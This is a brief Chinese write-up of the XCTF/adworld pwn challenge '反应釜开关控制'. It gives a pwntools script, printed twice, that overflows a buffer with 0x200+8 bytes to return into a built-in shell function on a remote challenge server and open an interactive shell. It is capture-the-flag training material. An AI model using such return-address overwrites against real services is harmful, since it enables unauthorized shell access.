[攻防世界 pwn]——反应釜开关控制
- 题目地址:https://adworld.xctf.org.cn/
- 题目:
无言以对,直接给你shell函数,返回覆盖到shell函数就OK了
exploit
from pwn import *
p = remote("111.200.241.244",31931)
payload='a' * (0x200 + 8)+p64(0x4005F6)
p.sendlineafter('>',payload)
p.interactive()
from pwn import *
p = remote("111.200.241.244",31931)
payload='a' * (0x200 + 8)+p64(0x4005F6)
p.sendlineafter('>',payload)
p.interactive()